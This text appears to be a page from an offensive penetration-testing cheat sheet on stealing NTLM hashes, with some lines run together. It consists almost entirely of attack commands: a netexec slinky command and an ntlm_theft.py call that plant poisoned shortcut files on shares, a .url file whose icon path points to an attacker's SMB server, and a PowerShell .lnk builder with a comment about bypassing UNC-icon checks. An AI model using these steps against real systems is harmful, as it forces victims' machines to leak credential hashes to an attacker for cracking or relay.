Steal NTLM
Triggers implicit SMB authentication and leaks a NetNTLMv2.
nxc
netexec smb <IP> -u <USER> -p <PASS> -M slinky -o NAME=evil SHARE=<NAME_SHARE> SERVER=<MyIP>python3 ntlm_theft.py -g all -s <IP> -f evil# insmbclient
prompt off
mput evil/*.url
[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0.lnk
$lnk = "$env:USERPROFILE\Desktop\evil.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\<IP>\share\payload.exe" # LISTENER SERVER
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save().library-ms ZIP
Last updated